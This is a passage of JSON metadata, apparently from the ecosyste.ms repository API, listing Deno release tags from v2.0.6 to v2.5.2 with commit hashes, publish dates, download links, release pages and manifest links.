dencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos